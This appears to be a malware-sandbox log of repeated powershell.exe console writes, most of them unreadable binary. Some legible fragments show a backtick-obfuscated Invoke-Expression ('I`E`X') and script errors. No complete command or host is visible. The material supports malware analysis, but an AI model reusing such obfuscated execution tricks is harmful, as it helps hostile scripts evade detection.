          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v..... ......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....!..............................}..v....."......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....(......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....)..............................}..v.....*......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....0......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....1..............................}..v.....2......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................[4k.....IT.............................}..v.....8......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............%X4k.....9..............................}..v.....:......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................[4k.....IT.............................}..v.....@......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............%X4k.....A..............................}..v.....B......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................[4k.....IT.............................}..v.....H......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............%X4k.....I..............................}..v.....J......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................[4k.....IT.............................}..v.....P......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............%X4k.....Q..............................}..v.....R......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W.......).|.I.`.E.`.X....IT.............................}..v.....U......0...............XFT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............%X4k....xV..............................}..v.....V......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................[4k.....IT.............................}..v.....]......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............%X4k....x^..............................}..v.....^......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o....... . . .a.d.a.t.a.E.x.c.e.p.t.i.o.n...............}..v.....c......0...............XFT.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............%X4k.....c..............................}..v....@d......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................[4k.....IT.............................}..v....`i......0.......................\.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............%X4k.....j..............................}..v.....j......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........[4k.....IT.............................}..v....(n......0...............XFT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....n..............................}..v....`o......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v....P(......0.......................~.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k.....)..............................}..v.....)......0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.6.............}..v.....-......0...............xiT.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....5......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P6..............................}..v.....6......0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....=......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P>..............................}..v.....>......0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....E......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....PF..............................}..v.....F......0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....M......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....PN..............................}..v.....N......0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....U......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....PV..............................}..v.....V......0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....]......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P^..............................}..v.....^......0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....e......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....Pf..............................}..v.....f......0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....m......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....Pn..............................}..v.....n......0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....u......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....Pv..............................}..v.....v......0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....}......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P~..............................}..v.....~......0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P...............................}..v............0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....% .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P& .............................}..v.....& .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................v4k.....lT.............................}..v.....- .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................v4k.....lT.............................}..v.....5 .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............Ew4k....P6 .............................}..v.....6 .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................v4k.....lT.............................}..v.....= .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............Ew4k....P> .............................}..v.....> .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................v4k.....lT.............................}..v.....E .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............Ew4k....PF .............................}..v.....F .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................v4k.....lT.............................}..v.....M .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............Ew4k....PN .............................}..v.....N .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................v4k.....lT.............................}..v.....U .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............Ew4k....PV .............................}..v.....V .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................v4k.....lT.............................}..v.....] .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............Ew4k....P^ .............................}..v.....^ .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................v4k.....lT.............................}..v.....e .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............Ew4k....Pf .............................}..v.....f .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....m .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....Pn .............................}..v.....n .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....u .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....Pv .............................}..v.....v .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v.....} .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P~ .............................}..v.....~ .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v4k.....lT.............................}..v...... .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ew4k....P. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............).|.I.`.E.`.X....lT.............................}..v...... .....0...............xiT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.................................7..... .......................}..v...... ..... ................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................v4k.....lT.............................}..v....P. .....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............Ew4k...... .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................v4k.....lT.............................}..v...... .....0.......................r.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............Ew4k...... .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;....... ........v4k.....lT.............................}..v...... .....0...............xiT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............Ew4k....X. .............................}..v...... .....0................jT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O.................4k......T.............................}..v....`"3.....0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............U.4k.....#3.............................}..v.....#3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.5.7.............}..v.....'3.....0.................T.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............U.4k....`(3.............................}..v.....(3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g.................4k......T.............................}..v...../3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............U.4k....................................}..v.....03.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s.................4k......T.............................}..v.....73.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............U.4k....`83.............................}..v.....83.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....?3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....`@3.............................}..v.....@3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....G3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....`H3.............................}..v.....H3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....O3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v.....P3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....W3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....`X3.............................}..v.....X3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v....._3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....``3.............................}..v.....`3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....g3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....`h3.............................}..v.....h3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....o3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v.....p3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....w3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....`x3.............................}..v.....x3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v......3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....`.3.............................}..v......3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v......3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....`.3.............................}..v......3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v......3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v......3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v....p.3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....(.3.............................}..v......3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v....p.3.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....(.3.............................}..v......3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .x.c.e.p.t.i.o.n...........................}..v....@.3.....0.................T.............................
